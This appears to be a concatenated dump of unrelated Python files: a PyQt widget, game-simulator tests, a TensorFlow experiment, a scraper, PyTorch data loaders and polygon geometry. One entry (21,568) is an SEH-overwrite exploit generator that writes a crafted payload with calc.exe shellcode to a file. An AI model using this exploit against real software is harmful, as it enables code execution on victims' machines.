21,563 | 38554405b7c13cd303ddd5e4f6d62a68dcdf8a8a | from PyQt5.QtWidgets import QTextBrowser
from PyQt5.QtGui import QFont
class Browser(QTextBrowser):
    """Read-only text pane styled as a dark, fixed-pitch console."""

    def __init__(self):
        super(Browser, self).__init__()
        font = QFont('Consolas', 11)  # set the widget's font: 11pt Consolas
        font.setFixedPitch(True)
        self.setFont(font)
        # Set the background colour and the text colour (dark theme).
        self.setStyleSheet(
            'background-color: rgb(49, 48, 42);'
            'color: rgb(235, 229, 209);'
        )
21,564 | 92fb0d78f519d3a000f64cf43de85a1317e2a099 | import pytest
import profile_viewer as pv
def test_standard_deviation():
    """Population standard deviation of trivial inputs."""
    # A single sample has zero spread.
    assert pv.standard_deviation([0]) == 0
    # Mean of [1, 0] is 0.5; each value deviates by exactly 0.5.
    assert pv.standard_deviation([1,0]) == 0.5
21,565 | 07d0d0dfa503395553258d5f5b127578b626735f | """Tests for Day 22 Puzzle"""
import unittest
import rpg
import strategy
class TestPuzzle22(unittest.TestCase):
    """Test for Day 22 Puzzle (wizard-vs-boss RPG simulator; Python 2)."""

    def test_simulate_combat(self):
        """Tests for simulate_combat(): two scripted battles the player wins."""
        rpg.VERBOSE = False
        if rpg.VERBOSE:
            print "*" * 30, 'Battle #1', "*" * 30
        player = rpg.Character('Player', hit_points=10, mana=250)
        boss = rpg.Character('Boss', hit_points=13, damage=8)
        spell_list = strategy.SpellList(['Poison', 'Magic Missile'])
        result = rpg.simulate_combat(player, boss, spell_list, {})
        # Player has 2 hit points, 0 armor, 24 mana
        self.assertEquals(player.hit_points, 2)
        self.assertEquals(player.armor, 0)
        self.assertEquals(player.mana, 24)
        # This kills the boss, and the player wins.
        self.assertTrue(boss.is_dead())
        self.assertFalse(player.is_dead())
        self.assertEquals(result, 1)
        if rpg.VERBOSE:
            print "*" * 30, 'Battle #2', "*" * 30
        player = rpg.Character('Player', hit_points=10, mana=250)
        boss = rpg.Character('Boss', hit_points=14, damage=8)
        spell_list = strategy.SpellList(['Recharge', 'Shield', 'Drain',
                                         'Poison', 'Magic Missile'])
        effects = {}
        result = rpg.simulate_combat(player, boss, spell_list, effects)
        self.assertEquals(result, 1)

    def test_simulate_combat_round(self):
        """Tests simulate_combat_round(): one Poison round, one Magic Missile."""
        rpg.VERBOSE = False
        player = rpg.Character('Player', hit_points=10, mana=250)
        boss = rpg.Character('Boss', hit_points=13, damage=8)
        effects = {}
        if rpg.VERBOSE:
            print "*" * 80
        # Player has 10 hit points, 0 armor, 250 mana
        self.assertEquals(player.hit_points, 10)
        self.assertEquals(player.armor, 0)
        self.assertEquals(player.mana, 250)
        # Boss has 13 hit points
        self.assertEquals(boss.hit_points, 13)
        rpg.simulate_combat_round(player, boss, effects, 'Poison')
        # Player has 2 hit points, 0 armor, 77 mana
        self.assertEquals(player.hit_points, 2)
        self.assertEquals(player.armor, 0)
        self.assertEquals(player.mana, 77)
        # Boss has 10 hit points
        self.assertEquals(boss.hit_points, 10)
        # Poison timer is now 4.
        # NOTE(review): the comment above says 4 but the assertion checks 5
        # -- one of the two is stale; confirm against simulate_combat_round.
        self.assertEquals(effects['Poison'], 5)
        # Player casts Magic Missile
        rpg.simulate_combat_round(player, boss, effects, 'Magic Missile')
        # Player has 2 hit points, 0 armor, 24 mana
        self.assertEquals(player.hit_points, 2)
        self.assertEquals(player.armor, 0)
        self.assertEquals(player.mana, 24)
        # Poison its timer is now 3
        self.assertEquals(effects['Poison'], 3)
        # This kills the boss, and the player wins.
        self.assertTrue(boss.is_dead())
        self.assertFalse(player.is_dead())
# Run the test suite when executed directly.
if __name__ == "__main__":
    unittest.main()
|
21,566 | 12820cfa62f9d7e7311ae1fff5e4a6d6bc56c1ab | import logging
import nig
import numpy as np
import os
import tensorflow as tf
from collections import OrderedDict
from functools import partial
from nig.data import loaders
from experiment.nig import experiments
__author__ = 'eaplatanios'
logger = logging.getLogger(__name__)
class RCV1V2Experiment(experiments.ExperimentBase):
def __init__(self, data_subsets, architectures, activation=tf.nn.relu,
labeled_batch_size=100, unlabeled_batch_size=100,
test_data_proportion=0.1, max_iter=1000, abs_loss_chg_tol=1e-6,
rel_loss_chg_tol=1e-6, loss_chg_iter_below_tol=5,
logging_frequency=10, summary_frequency=100,
checkpoint_frequency=1000, evaluation_frequency=10,
variable_statistics_frequency=-1, run_meta_data_frequency=-1,
working_dir=os.path.join(os.getcwd(), 'working'),
checkpoint_file_prefix='ckpt', restore_sequentially=False,
save_trained=True, optimizer=lambda: tf.train.AdamOptimizer(),
gradients_processor=None):
if isinstance(data_subsets, int):
data_subsets = [data_subsets]
self.data_subsets = data_subsets
self.architectures = architectures
# self.loss = nig.L2Loss()
self.loss = nig.BinaryCrossEntropy(
logit_outputs=False, one_hot_train_outputs=True)
optimizer_opts = {
'batch_size': labeled_batch_size,
'max_iter': max_iter,
'abs_loss_chg_tol': abs_loss_chg_tol,
'rel_loss_chg_tol': rel_loss_chg_tol,
'loss_chg_iter_below_tol': loss_chg_iter_below_tol,
'grads_processor': gradients_processor}
dataset_info = loaders.mulan.dataset_info['rcv1v2']
num_features = dataset_info['num_features']
num_labels = dataset_info['num_labels']
models = [nig.MultiLayerPerceptron(
input_size=num_features, output_size=num_labels,
hidden_layer_sizes=architecture, activation=activation,
softmax_output=False, sigmoid_output=True, log_output=False,
train_outputs_one_hot=True, loss=self.loss, loss_summary=False,
optimizer=optimizer, optimizer_opts=optimizer_opts)
for architecture in self.architectures]
# eval_metric = nig.HammingLoss(log_predictions=False)
eval_metrics = [
nig.Accuracy(
log_outputs=False, scaled_outputs=True,
one_hot_train_outputs=True, thresholds=0.5, macro_average=True),
nig.AreaUnderCurve(
log_outputs=False, scaled_outputs=True,
one_hot_train_outputs=True, curve='pr', num_thresholds=100,
macro_average=True, name='auc'),
nig.Precision(
log_outputs=False, scaled_outputs=True,
one_hot_train_outputs=True, thresholds=0.5, macro_average=True),
nig.Recall(
log_outputs=False, scaled_outputs=True,
one_hot_train_outputs=True, thresholds=0.5, macro_average=True),
nig.F1Score(
log_outputs=False, scaled_outputs=True,
one_hot_train_outputs=True, thresholds=0.5, macro_average=True)]
super(RCV1V2Experiment, self).__init__(
models=models, eval_metrics=eval_metrics,
labeled_batch_size=labeled_batch_size,
unlabeled_batch_size=unlabeled_batch_size,
test_data_proportion=test_data_proportion,
logging_frequency=logging_frequency,
summary_frequency=summary_frequency,
checkpoint_frequency=checkpoint_frequency,
evaluation_frequency=evaluation_frequency,
variable_statistics_frequency=variable_statistics_frequency,
run_meta_data_frequency=run_meta_data_frequency,
working_dir=working_dir,
checkpoint_file_prefix=checkpoint_file_prefix,
restore_sequentially=restore_sequentially,
save_trained=save_trained)
def __str__(self):
    """Short experiment identifier used for logging and result files."""
    return 'rcv1v2'
def experiment_information(self):
    """Return a string-valued summary of this experiment's configuration."""
    info = {
        'architectures': str(self.architectures),
        'loss': str(self.loss),
    }
    return info
def load_data(self, test_proportion=None):
    """Load the RCV1v2 Mulan subsets listed in ``self.data_subsets``.

    Returns ``(train_data, test_data)``, each an ``(inputs, labels)`` pair
    of stacked numpy arrays. When ``test_proportion`` is given, the
    original train/test split is discarded and the pooled data is re-split
    randomly using ``self.seed``.
    """
    train_data = []
    test_data = []
    for i in self.data_subsets:
        # Mulan subset files are 1-based: rcv1v2_subset_1 .. rcv1v2_subset_5.
        train_data_subset, test_data_subset = loaders.mulan.load(
            os.path.join(self.working_dir, 'data'),
            'rcv1v2_subset_' + str(i+1))
        train_data.append(train_data_subset)
        test_data.append(test_data_subset)
    # Stack the per-subset arrays into single (inputs, labels) pairs.
    train_data = (np.concatenate([d[0] for d in train_data], axis=0),
                  np.concatenate([d[1] for d in train_data], axis=0))
    test_data = (np.concatenate([d[0] for d in test_data], axis=0),
                 np.concatenate([d[1] for d in test_data], axis=0))
    if test_proportion is None:
        return train_data, test_data
    # Re-split: pool everything, shuffle deterministically with self.seed,
    # and take the last `test_proportion` fraction as the new test set.
    data = (np.concatenate([train_data[0], test_data[0]], axis=0),
            np.concatenate([train_data[1], test_data[1]], axis=0))
    if isinstance(self.seed, np.random.RandomState):
        rng = self.seed
    else:
        rng = np.random.RandomState(self.seed)
    indices = rng.permutation(np.arange(data[0].shape[0]))
    num_samples = len(indices)
    num_test = int(num_samples * test_proportion)
    # NOTE(review): if num_test == 0 (tiny test_proportion), indices[:-0]
    # is EMPTY and the whole pool becomes test data -- confirm callers
    # never pass a proportion that truncates to zero samples.
    train_data = tuple(d[indices[:-num_test]] for d in data)
    test_data = tuple(d[indices[-num_test:]] for d in data)
    return train_data, test_data
if __name__ == '__main__':
    # Experiment configuration for the RCV1v2 multi-label benchmark.
    seed = 9999
    data_subsets = [0, 1, 2, 3, 4]
    # Hidden-layer sizes of the candidate MLPs (one model per entry).
    architectures = [[1], [8],
                     [16, 8], [32, 16],
                     [128, 64, 32, 16], [128, 32, 8], [256, 128]]
    # NOTE(review): use_one_hot_encoding is never read in this script.
    use_one_hot_encoding = True
    activation = nig.leaky_relu(0.01)
    labeled_batch_size = 128
    unlabeled_batch_size = 128
    test_data_proportion = 0.95
    # Stopping criteria for training.
    max_iter = 5000
    abs_loss_chg_tol = 1e-6
    rel_loss_chg_tol = 1e-6
    loss_chg_iter_below_tol = 5
    # -1 disables the corresponding periodic hook.
    logging_frequency = 100
    summary_frequency = -1
    checkpoint_frequency = -1
    evaluation_frequency = 100
    variable_statistics_frequency = -1
    run_meta_data_frequency = -1
    working_dir = os.path.join(os.getcwd(), 'working', 'rcv1v2')
    checkpoint_file_prefix = 'ckpt'
    restore_sequentially = False
    save_trained = False
    optimizer = lambda: tf.train.AdamOptimizer() # nig.gradient_descent(1e-1, decay_rate=0.99)
    gradients_processor = None # lambda g: tf.clip_by_norm(g, 1e-1)
    # optimizer = tf.contrib.opt.ScipyOptimizerInterface
    # optimizer_opts = {'options': {'maxiter': 10000}}
    # def consensus_loss_metric(outputs, consensus):
    # with tf.name_scope('consensus_loss_metric'):
    # outputs = tf.exp(outputs)
    # metric = tf.square(tf.sub(outputs, consensus))
    # metric = tf.reduce_sum(metric)
    # return metric
    consensus_loss_metric = None
    # One configuration per consensus-loss weight; the multiplier rescales
    # the unlabeled loss to the labeled batch size.
    consensus_configurations = experiments.get_consensus_configurations(
        consensus_loss_weights=[0.0, 1.0],
        multiplier=labeled_batch_size / unlabeled_batch_size)
    with nig.dummy(): # tf.device('/cpu:0'):
        experiment = RCV1V2Experiment(
            data_subsets=data_subsets, architectures=architectures,
            activation=activation, labeled_batch_size=labeled_batch_size,
            unlabeled_batch_size=unlabeled_batch_size,
            test_data_proportion=test_data_proportion, max_iter=max_iter,
            abs_loss_chg_tol=abs_loss_chg_tol,
            rel_loss_chg_tol=rel_loss_chg_tol,
            loss_chg_iter_below_tol=loss_chg_iter_below_tol,
            logging_frequency=logging_frequency,
            summary_frequency=summary_frequency,
            checkpoint_frequency=checkpoint_frequency,
            evaluation_frequency=evaluation_frequency,
            variable_statistics_frequency=variable_statistics_frequency,
            run_meta_data_frequency=run_meta_data_frequency,
            working_dir=working_dir,
            checkpoint_file_prefix=checkpoint_file_prefix,
            restore_sequentially=restore_sequentially,
            save_trained=save_trained, optimizer=optimizer,
            gradients_processor=gradients_processor)
        # Build the learner registry: one consensus learner per
        # configuration, plus a cross-validation baseline.
        learners = []
        for name, configuration in consensus_configurations:
            learner = partial(nig.ConsensusLearner, **configuration)
            learners.append((name, learner))
        learners.append(('CV', nig.CrossValidationLearner))
        learners = OrderedDict(learners)
        results = experiment.run(learners)
        experiments.save_results(
            results, filename=os.path.join(working_dir, 'results.pk'),
            update=True, use_backup=True, delete_backup=False, yaml_format=False)
        # results = experiments.load_results(
        # filename=os.path.join(working_dir, 'results.pk'), yaml_format=False)
        experiments.plot_results(results)
|
21,567 | 4b1052ec9ff3ff6056449b358ef5f4b53de24324 | #!/usr/bin/env python
import os.path
import re
import sys
import urllib.request
import yaml
def download_file(url, fname_out=None):
    """Download *url*.

    Returns the decoded UTF-8 text when *fname_out* is None; otherwise
    writes the raw bytes to *fname_out* and returns that path.
    Exits the process on SSL errors (legacy behaviour, kept).

    Fixes vs. original: the `-> None` annotation was wrong (the function
    always returns a value), and `os.makedirs` crashed with a bare file
    name because `os.path.dirname` returns '' then.
    """
    import ssl
    try:
        with urllib.request.urlopen(url) as f:
            if not fname_out:
                return f.read().decode("utf-8")
            fdir = os.path.dirname(fname_out)
            # Only create a directory when the target path actually has one.
            if fdir and not os.path.exists(fdir):
                os.makedirs(fdir)
            with open(fname_out, "wb") as outfile:
                outfile.write(f.read())
            return fname_out
    except ssl.SSLError as err:
        # Report the actual failure instead of the original "WHAT!".
        print("SSL error while downloading {}: {}".format(url, err), file=sys.stderr)
        sys.exit(1)
def main():
    """Scrape the PMLR index page and print a YAML mapping of
    volume title -> [bibliography.bib URL]."""
    base_url = """http://proceedings.mlr.press/"""
    volume_re = re.compile("""<a href="([^"]*)"><b>(Volume .*)</b></a>""")
    volumes = {}
    page = download_file("http://proceedings.mlr.press/")
    for line in page.split("\n"):
        found = volume_re.search(line)
        if not found:
            continue
        volumes[found.group(2)] = [base_url + found.group(1) + "/bibliography.bib"]
    print(yaml.dump(volumes))
if __name__ == "__main__":
    main()
|
21,568 | 60b78c39e81993eba987ce39982e4e70e26f9340 |
# SEH-overwrite exploit generator: builds a crafted text payload
# (filler + nSEH/SEH overwrite + shellcode) and writes it to a file.
nSeh="\x41\xEB\x18\x41" # -> jmp back 4 bytes
Seh="\xC0\x28\x40\x00" # 004028c0 -> pop pop ret
#bads
#\x09\x0a\x00\x0a\x0b\x0c\x0d\x0e\x0f\x20
# Encoded calc.exe shellcode (kept byte-for-byte).
calc=("\xd9\xc5\xbd\xb1\xb0\x27\xca\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x30\x83\xc2\x04\x31\x6a\x14\x03\x6a\xa5\x52\xd2\x36\x2d\x10"
"\x1d\xc7\xad\x75\x97\x22\x9c\xb5\xc3\x27\x8e\x05\x87\x6a\x22"
"\xed\xc5\x9e\xb1\x83\xc1\x91\x72\x29\x34\x9f\x83\x02\x04\xbe"
"\x07\x59\x59\x60\x36\x92\xac\x61\x7f\xcf\x5d\x33\x28\x9b\xf0"
"\xa4\x5d\xd1\xc8\x4f\x2d\xf7\x48\xb3\xe5\xf6\x79\x62\x7e\xa1"
"\x59\x84\x53\xd9\xd3\x9e\xb0\xe4\xaa\x15\x02\x92\x2c\xfc\x5b"
"\x5b\x82\xc1\x54\xae\xda\x06\x52\x51\xa9\x7e\xa1\xec\xaa\x44"
"\xd8\x2a\x3e\x5f\x7a\xb8\x98\xbb\x7b\x6d\x7e\x4f\x77\xda\xf4"
"\x17\x9b\xdd\xd9\x23\xa7\x56\xdc\xe3\x2e\x2c\xfb\x27\x6b\xf6"
"\x62\x71\xd1\x59\x9a\x61\xba\x06\x3e\xe9\x56\x52\x33\xb0\x3c"
"\xa5\xc1\xce\x72\xa5\xd9\xd0\x22\xce\xe8\x5b\xad\x89\xf4\x89"
"\x8a\x66\xbf\x90\xba\xee\x66\x41\xff\x72\x99\xbf\xc3\x8a\x1a"
"\x4a\xbb\x68\x02\x3f\xbe\x35\x84\xd3\xb2\x26\x61\xd4\x61\x46"
"\xa0\xb7\xe4\xd4\x28\x38")
# 4424 filler bytes reach the SEH record, then nSEH/SEH, 90 bytes of
# padding, then the shellcode.
payload="A"*4424 + nSeh + Seh + "A"*90 + calc
filename="bruhHacker.txt"
# bug fix: use a context manager so the handle is always closed
with open(filename, "w") as out_file:
    out_file.write(payload)
21,569 | 9588ed805e4e96a84c515a174a6236946e17fe98 | from pathlib import Path
import numpy as np
import pandas as pd
from PIL import Image
from torch.utils.data import Dataset, DataLoader
from torch.utils.data.dataset import Subset
from torch.utils.data.dataloader import default_collate
from torchvision.transforms import Compose
class TrainvalFilesDataset(Dataset):
    """Dataset of (filepath, label) pairs for train/val PNG images.

    Labels are parsed from the file name, which must look like
    "<something>_<label>.png" (the second '_'-separated token of the stem).
    """

    def __init__(self, path, corrupted_files=None):
        self.path = Path(path)
        assert self.path.exists(), "Train/Val dataset is not found at '{}'".format(path)
        files = self.path.glob("*.png")
        # Paths are stored as POSIX-style strings, not Path objects.
        self.images = [f.as_posix() for f in files]
        # remove corrupted files:
        if corrupted_files is not None:
            for f in corrupted_files:
                # NOTE(review): list.remove raises ValueError if f is absent;
                # entries must be posix strings matching self.images exactly.
                self.images.remove(f)
        self.n = len(self.images)
        self.labels = [None] * self.n
        for i, f in enumerate(self.images):
            self.labels[i] = int(Path(f).stem.split('_')[1])
        self.unique_labels = np.unique(self.labels)

    def __len__(self):
        return self.n

    def __getitem__(self, index):
        # Returns (filepath string, int label); image loading happens later.
        return self.images[index], self.labels[index]
class FilesFromCsvDataset(Dataset):
    """Dataset of (filepath, label) pairs read from a CSV file.

    The CSV must contain 'filepath' and 'label' columns.
    """

    def __init__(self, csv_filepath):
        self.csv_filepath = Path(csv_filepath)
        assert self.csv_filepath.exists(), "CSV filepath '{}' is not found".format(csv_filepath)
        df = pd.read_csv(self.csv_filepath)
        self.n = len(df)
        self.images = df['filepath'].values
        self.labels = df['label'].values

    def __len__(self):
        return self.n

    def __getitem__(self, index):
        # Returns (filepath, label) exactly as stored in the CSV.
        return self.images[index], self.labels[index]
class TestFilesDataset(Dataset):
    """Dataset of (filepath, image_id) pairs for test PNG images.

    Supports two naming schemes, detected from the first file:
    "<id>_<label>.png" (train-style) or "<id>.png" (test-style).
    """

    def __init__(self, path):
        path = Path(path)
        assert path.exists(), "Test dataset is not found at '{}'".format(path)
        files = path.glob("*.png")
        # Unlike TrainvalFilesDataset, paths are kept as Path objects here;
        # __getitem__ converts to posix strings on access.
        self.images = [f for f in files]
        if "_" in self.images[0].stem:
            self.image_ids = [self.train_filepath_to_image_id(f) for f in self.images]
        else:
            self.image_ids = [self.test_filepath_to_image_id(f) for f in self.images]
        self.n = len(self.images)

    def __len__(self):
        return self.n

    def __getitem__(self, index):
        return self.images[index].as_posix(), self.image_ids[index]

    @staticmethod
    def train_filepath_to_image_id(filepath):
        # "123_7.png" -> 123
        stem = filepath.stem
        split = stem.split("_")
        return int(split[0])

    @staticmethod
    def test_filepath_to_image_id(filepath):
        # "123.png" -> 123
        stem = filepath.stem
        return int(stem)
def read_image(fp):
    """Open the image at path *fp* as a PIL Image (lazy-loaded)."""
    return Image.open(fp)
class TransformedDataset(Dataset):
    """Wrap a (sample, label) dataset, applying *transforms* to each sample
    and, optionally, *target_transforms* to each label."""

    def __init__(self, dataset, transforms, target_transforms=None):
        assert isinstance(dataset, Dataset)
        assert callable(transforms)
        if target_transforms is not None:
            assert callable(target_transforms)
        self.dataset = dataset
        self.transforms = transforms
        self.target_transforms = target_transforms

    def __len__(self):
        return len(self.dataset)

    def __getitem__(self, index):
        img, label = self.dataset[index]
        img = self.transforms(img)
        if self.target_transforms is not None:
            label = self.target_transforms(label)
        return img, label
def get_data_loaders(train_dataset_path,
                     val_dataset_path,
                     train_data_transform,
                     val_data_transform,
                     train_batch_size, val_batch_size,
                     num_workers,
                     pin_memory=True,
                     collate_fn=default_collate):
    """Build train and validation DataLoaders over file-based datasets.

    Transforms may be a single callable or a list/tuple (composed here).
    Pipeline per sample: read_image -> user transform; labels are shifted
    from 1-based to 0-based via `l - 1`.
    """
    if isinstance(train_data_transform, (list, tuple)):
        train_data_transform = Compose(train_data_transform)
    if isinstance(val_data_transform, (list, tuple)):
        val_data_transform = Compose(val_data_transform)
    train_dataset = TrainvalFilesDataset(train_dataset_path)
    val_dataset = TrainvalFilesDataset(val_dataset_path)
    # First wrapper: load the image file and make labels 0-based.
    train_dataset = TransformedDataset(train_dataset, transforms=read_image,
                                       target_transforms=lambda l: l - 1)
    val_dataset = TransformedDataset(val_dataset, transforms=read_image,
                                     target_transforms=lambda l: l - 1)
    # Second wrapper: the user-provided augmentation/normalisation.
    train_dataset = TransformedDataset(train_dataset, transforms=train_data_transform)
    val_dataset = TransformedDataset(val_dataset, transforms=val_data_transform)
    train_loader = DataLoader(train_dataset, batch_size=train_batch_size,
                              shuffle=True,
                              collate_fn=collate_fn,
                              num_workers=num_workers, pin_memory=pin_memory)
    # NOTE(review): shuffle=True on the validation loader is unusual;
    # presumably harmless here but confirm it is intentional.
    val_loader = DataLoader(val_dataset, batch_size=val_batch_size, shuffle=True,
                            collate_fn=collate_fn,
                            num_workers=num_workers, pin_memory=pin_memory)
    return train_loader, val_loader
def get_test_data_loader(dataset_path,
                         test_data_transform,
                         batch_size,
                         num_workers, pin_memory=True):
    """Build a non-shuffled DataLoader over the test images.

    *test_data_transform* may be a list/tuple of transforms or a single
    callable; ``read_image`` is always applied first for list inputs.

    Bug fix: the original mutated the caller's transform list in place
    (``list.insert``), so calling this twice with the same list prepended
    ``read_image`` twice. A fresh list is built instead.
    """
    if isinstance(test_data_transform, (list, tuple)):
        test_data_transform = Compose([read_image] + list(test_data_transform))
    test_dataset = TestFilesDataset(dataset_path)
    test_dataset = TransformedDataset(test_dataset, transforms=test_data_transform)
    test_loader = DataLoader(test_dataset, batch_size=batch_size,
                             shuffle=False, drop_last=False,
                             num_workers=num_workers, pin_memory=pin_memory)
    return test_loader
def get_train_eval_data_loader(train_loader, indices=None):
    """Clone *train_loader* restricted to *indices*, without shuffling.

    Used to evaluate on a fixed subset of the training data; all loader
    settings except shuffle/drop_last are copied from the source loader.
    """
    assert isinstance(indices, (list, tuple, np.ndarray))
    subset = Subset(train_loader.dataset, indices)
    train_eval_loader = DataLoader(subset, batch_size=train_loader.batch_size,
                                   shuffle=False, drop_last=False,
                                   num_workers=train_loader.num_workers,
                                   pin_memory=train_loader.pin_memory,
                                   collate_fn=train_loader.collate_fn,
                                   timeout=train_loader.timeout,
                                   worker_init_fn=train_loader.worker_init_fn)
    return train_eval_loader
21,570 | f71601505181f59e5a539b068568790314bee994 | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import math
import shapely.geometry
def get_polygon_corner(polygon):
    """Corner coordinates [left_y, right_y, bottom_z, top_z] of an
    axis-aligned rectangle given as [[ly,bz],[ry,bz],[ry,tz],[ly,tz]]."""
    first, second, third = polygon[0], polygon[1], polygon[2]
    return [first[0], second[0], first[1], third[1]]
def create_rectangle(left_y, right_y, bottom_z, top_z):
    """Build an axis-aligned rectangle as four [y, z] points, ordered
    counter-clockwise starting at the bottom-left corner."""
    bottom_left = [left_y, bottom_z]
    bottom_right = [right_y, bottom_z]
    top_right = [right_y, top_z]
    top_left = [left_y, top_z]
    return [bottom_left, bottom_right, top_right, top_left]
# all polygons are in the yOz plane
def measure_polygons_width_along_yaxis(polygons):
    """Return [min_y, max_y] for each polygon.

    Points are [y, z] pairs, so pt[0] is the y coordinate.
    Improvement: min/max is O(n) per polygon versus the original's
    O(n log n) full sort, with identical results.
    """
    y_intervals = []
    for polygon in polygons:
        y_coordinates = [pt[0] for pt in polygon]
        y_intervals.append([min(y_coordinates), max(y_coordinates)])
    return y_intervals
def boolean_intersection_polygon_vertical_rectangle(polygon, y_interval, tolerance = 1E-4):
    """Clip *polygon* to the vertical strip y_interval=[left, right] and
    return the tallest axis-aligned rectangle inscribed in the clipped
    shape (a 4-point list; see create_rectangle).

    Assumes the intersection is a single simple polygon whose exterior
    touches both strip edges -- TODO confirm for concave inputs.
    """
    # Full z-extent of the polygon (strip spans its whole height).
    z_coordinates = []
    for pt in polygon:
        z_coordinates.append(pt[1])
    z_coordinates.sort()
    vertical_rectangle = create_rectangle(y_interval[0], y_interval[1], z_coordinates[0], z_coordinates[-1])
    shapely_vertical_rectangle = shapely.geometry.Polygon(vertical_rectangle)
    shapely_polygon = shapely.geometry.Polygon(polygon)
    shapely_intersec_polygon = shapely_polygon.intersection(shapely_vertical_rectangle)
    intersection = []
    for pt in shapely_intersec_polygon.exterior.coords:
        intersection.append([pt[0], pt[1]])
    # find the maximum rectange inside the intersection polygon
    # Collect intersection vertices lying on the strip's left/right edges
    # (within `tolerance` of the edge y value).
    pt_at_left_z = []
    pt_at_right_z = []
    for pt in intersection:
        if abs(pt[0] - y_interval[0]) < tolerance:
            pt_at_left_z.append(pt[1])
        if (abs(pt[0] - y_interval[1]) < tolerance):
            pt_at_right_z.append(pt[1])
    # The inscribed rectangle spans the z-overlap of both edges' ranges.
    rectangle_minimum_z = max(min(pt_at_left_z), min(pt_at_right_z))
    rectangle_maximum_z = min(max(pt_at_left_z), max(pt_at_right_z))
    maximize_inscribe_rectangle = create_rectangle(y_interval[0], y_interval[1], rectangle_minimum_z, rectangle_maximum_z)
    return maximize_inscribe_rectangle
def measure_polygon_area(poly):
    """Planar area of *poly* (a list of [y, z] points) computed via shapely."""
    return shapely.geometry.Polygon(poly).area
def draw_polygons_wireframe(polygons):
    """Plot the outlines of *polygons* with matplotlib (blocking show)."""
    import matplotlib.pyplot as plt
    plt.figure()
    for id in range(0, len(polygons)):
        poly_coord = polygons[id]
        coord = poly_coord.copy()
        coord.append(coord[0]) # repeat the first point to create a 'closed loop'
        xs, ys = zip(*coord) # create lists of x and y values
        plt.plot(xs, ys, color="black")
    plt.show()
def draw_polygons_with_strengths(polygons, strength, strength_min = 0, strength_max = 2):
    """Plot *polygons* filled with a jet colormap of their *strength*
    values, normalised to [strength_min, strength_max], plus a colorbar.

    `strength` must have one entry per polygon.
    """
    import matplotlib.pyplot as plt
    import matplotlib.colors as colors
    import matplotlib.cm as cmx
    jet = cm = plt.get_cmap('jet')
    cNorm = colors.Normalize(vmin=strength_min, vmax=strength_max)
    scalarMap = cmx.ScalarMappable(norm=cNorm, cmap=jet)
    plt.figure()
    for id in range(0, len(polygons)):
        poly_coord = polygons[id]
        coord = poly_coord.copy()
        coord.append(coord[0]) # repeat the first point to create a 'closed loop'
        xs, ys = zip(*coord) # create lists of x and y values
        plt.plot(xs, ys, color="black")
        colorVal = scalarMap.to_rgba(strength[id])
        plt.fill(xs, ys, color=colorVal)
    plt.colorbar(scalarMap, label="Strength", orientation="vertical")
    plt.show()
def slice_polygons_vertically_with_intervals(polygons,
                                             polygons_strengths,
                                             slice_y_intervals):
    """For each slice interval, clip every polygon that fully spans it and
    collect the inscribed rectangles plus their strengths.

    Returns [shapes, strengths] with one entry per (interval, polygon) hit.
    """
    polygons_yaxis_intervals = measure_polygons_width_along_yaxis(polygons)
    polygons_intersec_shapes = []
    polygons_intersec_strengths = []
    for slice_intv in slice_y_intervals:
        for id in range(0, len(polygons)):
            polygon = polygons[id]
            polygon_x_interval = polygons_yaxis_intervals[id]
            strength = polygons_strengths[id]
            # Only polygons that fully cover the slice interval contribute.
            if polygon_x_interval[1] >= slice_intv[1] and slice_intv[0] >= polygon_x_interval[0]:
                intersection = boolean_intersection_polygon_vertical_rectangle(polygon, slice_intv)
                polygons_intersec_shapes.append(intersection)
                polygons_intersec_strengths.append(strength)
    return [polygons_intersec_shapes, polygons_intersec_strengths]
def slice_polygons_vertically(polygons,
                              polygons_strengths,
                              resolution,
                              tolerance = 1E-4):
    """
    Slice given polygons into thin strips and projected into 2D

    Strips are at most `resolution` wide; intervals narrower than
    `tolerance`, or where no polygon projects, are skipped.
    NOTE(review): local names say "x" but the helper measures the y axis
    (points are [y, z]); the logic is consistent, only the naming is off.
    """
    # the intervals of polygons projected into X axis
    x_intervals = measure_polygons_width_along_yaxis(polygons)
    # the x value of intervals (ascend)
    x_endpoints = [0]
    for intv in x_intervals:
        x_endpoints.append(intv[0])
        x_endpoints.append(intv[1])
    # de-duplicate endpoints, then sort ascending
    x_endpoints = list(set(x_endpoints))
    x_endpoints.sort()
    # compute all possible candidate intervals
    candidate_intervals = []
    for id in range(0, len(x_endpoints) - 1):
        interval_left_x = x_endpoints[id]
        interval_right_x = x_endpoints[id + 1]
        # in some intervals, the polygons may have zero projection area
        # we ignore these intervals to accelerate our program
        is_interval_valid = False
        for intv in x_intervals:
            if interval_left_x > intv[1] - tolerance or interval_right_x < intv[0] + tolerance:
                is_interval_valid = False
            else:
                is_interval_valid = True
                break
        if is_interval_valid == False:
            continue
        interval_width = interval_right_x - interval_left_x
        # if the interval width is smaller than the fabrication tolerance, we ignore this interval
        if interval_width < tolerance:
            continue
        # split wide intervals into equal segments no wider than `resolution`
        num_segments = math.ceil(interval_width / resolution)
        for kd in range(0, num_segments):
            segment_left_x = interval_left_x + interval_width / num_segments * kd
            segment_right_x = interval_left_x + interval_width / num_segments * (kd + 1)
            candidate_intervals.append([segment_left_x, segment_right_x])
    [polygons_intersec_shapes, polygons_intersec_strengths] = slice_polygons_vertically_with_intervals(polygons, polygons_strengths, candidate_intervals)
    return [polygons_intersec_shapes, polygons_intersec_strengths]
def squarize_rectangle(left_y, right_y, bottom_z, top_z, resolution, tolerance):
    """Split the rectangle into a vertical stack of `resolution`-high
    rectangles, plus a final leftover strip when it is taller than
    `tolerance`."""
    height = top_z - bottom_z
    full_rows = math.floor(height / resolution)
    squares = [
        create_rectangle(left_y, right_y,
                         bottom_z + row * resolution,
                         bottom_z + (row + 1) * resolution)
        for row in range(full_rows)
    ]
    # leftover
    leftover_bottom = bottom_z + full_rows * resolution
    if top_z - leftover_bottom > tolerance:
        squares.append(create_rectangle(left_y, right_y, leftover_bottom, top_z))
    return squares
def squarize_polygons(polygons,
                      polygons_strengths,
                      resolution,
                      tolerance = 1E-4):
    """Slice *polygons* into vertical strips, then cut each strip into
    `resolution`-high squares; strips straddling z=0 are split at z=0
    first so no square crosses the axis.

    Returns [square_shapes, square_strengths], strengths copied from the
    originating strip.
    """
    [slice_polygons, slice_polygons_strengths] = slice_polygons_vertically(polygons, polygons_strengths, resolution, tolerance)
    squares_shapes = []
    squares_strength = []
    for id in range(0, len(slice_polygons)):
        polygon = slice_polygons[id]
